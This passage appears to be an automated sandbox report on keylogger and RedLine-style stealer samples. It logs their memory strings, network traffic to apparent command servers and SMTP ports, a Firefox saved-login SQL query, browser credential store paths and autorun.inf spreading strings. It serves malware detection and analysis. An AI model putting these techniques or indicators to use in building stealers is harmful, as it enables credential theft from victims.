                  Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb86 source: Windows Update.exe, 00000011.00000002.405064148.000000000838A000.00000004.00000010.sdmp
                  Source: Binary string: oC:\Windows\mscorlib.pdb source: Windows Update.exe, 00000011.00000002.405064148.000000000838A000.00000004.00000010.sdmp
                  Source: Binary string: rlib.pdb source: Windows Update.exe, 00000011.00000002.397838625.0000000002F57000.00000004.00000040.sdmp
                  Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: Windows Update.exe, 00000011.00000002.397838625.0000000002F57000.00000004.00000040.sdmp
                  Source: Keylogger.exeBinary or memory string: [autorun]
                  Source: Keylogger.exeBinary or memory string: autorun.inf
                  Source: RedLine.MainPanel-cracked.exe, 00000004.00000002.344112668.0000000002630000.00000004.00020000.sdmpBinary or memory string: autorun.inf![autorun]
                  Source: RedLine.MainPanel-cracked.exe, 00000004.00000002.344112668.0000000002630000.00000004.00020000.sdmpBinary or memory string: autorun.inf![autorun]
                  Source: RedLine.MainPanel-cracked.exe, 00000005.00000002.339955429.0000000002861000.00000004.00000001.sdmpBinary or memory string: autorun.inf![autorun]
                  Source: RedLine.MainPanel-cracked.exe, 00000005.00000002.339955429.0000000002861000.00000004.00000001.sdmpBinary or memory string: autorun.inf![autorun]
                  Source: RedLine.exe, 00000010.00000002.570406850.0000000002AD6000.00000004.00000001.sdmpBinary or memory string: autorun.inf
                  Source: RedLine.exe, 00000010.00000002.570406850.0000000002AD6000.00000004.00000001.sdmpBinary or memory string: [autorun]
                  Source: RedLine.exe, 00000010.00000002.569953826.0000000002A81000.00000004.00000001.sdmpBinary or memory string: autorun.inf![autorun]
                  Source: RedLine.exe, 00000010.00000002.569953826.0000000002A81000.00000004.00000001.sdmpBinary or memory string: autorun.inf![autorun]
                  Source: Windows Update.exeBinary or memory string: [autorun]
                  Source: Windows Update.exeBinary or memory string: autorun.inf
                  Source: Windows Update.exe, 00000011.00000002.399929193.00000000035FD000.00000004.00000001.sdmpBinary or memory string: [autorun]
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 4x nop then jmp 02A71A73h
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 4x nop then jmp 02A71A73h
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 4x nop then jmp 02A71A73h
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then jmp 02F71A73h
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then mov esp, ebp
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then jmp 02F71A73h
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]

                  Networking:

                  barindex
                  May check the online IP address of the machineShow sources
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeDNS query: name: whatismyipaddress.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                  Source: global trafficTCP traffic: 192.168.2.3:49753 -> 173.194.79.109:587
                  Source: global trafficTCP traffic: 192.168.2.3:49754 -> 82.202.167.226:6542
                  Source: global trafficTCP traffic: 192.168.2.3:49805 -> 173.194.79.108:587
                  Source: global trafficTCP traffic: 192.168.2.3:49753 -> 173.194.79.109:587
                  Source: global trafficTCP traffic: 192.168.2.3:49805 -> 173.194.79.108:587
                  Source: vbc.exeString found in binary or memory: http://www.facebook.com/
                  Source: vbc.exe, 0000001C.00000000.394707935.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.facebook.com/https://login.yahoo.com/config/login
                  Source: vbc.exe, 0000001C.00000003.411487193.0000000002264000.00000004.00000001.sdmpString found in binary or memory: http://www.facebook.com/https://login.yahoo.com/config/login:
                  Source: vbc.exe, 0000001C.00000003.409624926.0000000002264000.00000004.00000001.sdmpString found in binary or memory: http://www.facebook.com/https://login.yahoo.com/config/loginV
                  Source: Keylogger.exe, 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, Windows Update.exe, 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                  Source: Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
                  Source: Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
                  Source: Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmpString found in binary or memory: http://crls.pki.goog/gts1c3/moVDfISia2k.crl0
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: Keylogger.exe, 00000002.00000002.346733504.0000000000E49000.00000004.00000020.sdmpString found in binary or memory: http://go.microsoft.
                  Source: Keylogger.exe, 00000002.00000002.346733504.0000000000E49000.00000004.00000020.sdmpString found in binary or memory: http://go.microsoft.LinkId=42127
                  Source: user32dll.exe, 00000013.00000003.356248617.00000000006CA000.00000004.00000001.sdmpString found in binary or memory: http://menejelv.beget.tech/
                  Source: Keylogger.exe, 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, Windows Update.exe, 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr10)
                  Source: Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1c301
                  Source: Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
                  Source: Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
                  Source: Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
                  Source: Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
                  Source: vbc.exe, 0000001C.00000003.408089051.0000000002253000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: Windows Update.exe, 00000011.00000002.400895126.000000000381D000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com
                  Source: Keylogger.exe, Windows Update.exeString found in binary or memory: http://whatismyipaddress.com/
                  Source: Keylogger.exe, 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, Windows Update.exe, 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmpString found in binary or memory: http://whatismyipaddress.com/-
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmp, Keylogger.exe, 00000002.00000003.318472330.00000000054B0000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: Keylogger.exe, 00000002.00000003.326372691.00000000054AE000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersno
                  Source: Keylogger.exe, 00000002.00000003.345653581.00000000054A0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comasuq/w
                  Source: Keylogger.exe, 00000002.00000003.345653581.00000000054A0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comceu
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                  Source: Keylogger.exe, 00000002.00000003.317599242.00000000054B4000.00000004.00000001.sdmp, Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: vbc.exe, 0000001C.00000003.408089051.0000000002253000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
                  Source: vbc.exe, 0000001C.00000003.408089051.0000000002253000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
                  Source: vbc.exe, vbc.exe, 0000001C.00000000.394707935.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: Keylogger.exe, 00000002.00000003.319800118.00000000054D6000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: Windows Update.exe, 00000011.00000002.398362779.00000000033D1000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                  Source: Keylogger.exe, 00000002.00000003.322374520.00000000054B1000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: Keylogger.exe, 00000002.00000002.348451962.00000000067B2000.00000004.00000001.sdmp, Keylogger.exe, 00000002.00000003.318514651.00000000054B2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: Keylogger.exe, 00000002.00000003.318514651.00000000054B2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnT
                  Source: Keylogger.exe, 00000002.00000003.318514651.00000000054B2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cna
                  Source: Keylogger.exe, 00000002.00000003.318514651.00000000054B2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
                  Source: Keylogger.exe, 00000002.00000003.318514651.00000000054B2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnz
                  Source: vbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
                  Source: vbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
                  Source: vbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
                  Source: hhzclipper.exe, 00000003.00000000.315938270.00000000001E2000.00000002.00020000.sdmpString found in binary or memory: https://Esteamcommunity.com/tradeoffer/new/
                  Source: vbc.exe, 0000001C.00000003.409677270.000000000081D000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856
                  Source: vbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
                  Source: vbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
                  Source: vbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                  Source: vbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                  Source: vbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                  Source: vbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
                  Source: vbc.exe, 0000001C.00000003.409116998.0000000002253000.00000004.00000001.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
                  Source: Keylogger.exe, Windows Update.exe, vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: Windows Update.exe, 00000011.00000002.404185049.0000000006DF4000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
                  Source: Keylogger.exe, Windows Update.exe, vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: vbc.exe, 0000001C.00000003.408089051.0000000002253000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/
                  Source: vbc.exe, 0000001C.00000003.408089051.0000000002253000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
                  Source: vbc.exe, 0000001C.00000003.408089051.0000000002253000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
                  Source: unknownDNS traffic detected: queries for: 231.58.0.0.in-addr.arpa
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_014AA09A recv,
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 18 Nov 2021 09:14:13 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTSet-Cookie: __cf_bm=sGeod6pqVWjcwREELm2hUH2GgAdW_2GQyVQFKmuAcw0-1637226853-0-ARb8/mXyrtsjliF6MoAc1RTKm13uI/eP7YlvFz7ZWBMjq2DYNWHf6wU8P4W3in6z8BV4TXLAYgb9S5ghyt8nUT4=; path=/; expires=Thu, 18-Nov-21 09:44:13 GMT; domain=.whatismyipaddress.com; HttpOnlyServer: cloudflareCF-RAY: 6b00165a9d85690a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 18 Nov 2021 09:15:00 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTSet-Cookie: __cf_bm=_VxCpL1SUogQPkmhm6XJQzy_263PsYORKxhnP5Lzpu8-1637226900-0-AakJJ2rong7agBiGXb/Yc2BMeTYb8+YfO1kR1pbeDWQZeZMuafai1azbDQQgGLp6uCRe9S4dAlA9ilezE9rCYhI=; path=/; expires=Thu, 18-Nov-21 09:45:00 GMT; domain=.whatismyipaddress.com; HttpOnlyServer: cloudflareCF-RAY: 6b00177fbd724e44-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.202.167.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.202.167.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.202.167.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.202.167.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.202.167.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.202.167.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.202.167.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.202.167.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.202.167.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.202.167.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.202.167.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.202.167.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.202.167.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.202.167.226
                  Source: unknownTCP traffic detected without corresponding DNS query: 82.202.167.226
                  Source: Keylogger.exe, 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, Windows Update.exe, 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmp, vbc.exe, 0000001C.00000000.394707935.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                  Source: Keylogger.exe, 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, Windows Update.exe, 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmp, vbc.exe, 0000001C.00000000.394707935.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                  Source: Keylogger.exe, Windows Update.exe, vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: vbc.exe, 0000001C.00000003.411487193.0000000002264000.00000004.00000001.sdmpString found in binary or memory: https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_co
                  Source: vbc.exe, 0000001C.00000003.411487193.0000000002264000.00000004.00000001.sdmpString found in binary or memory: https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg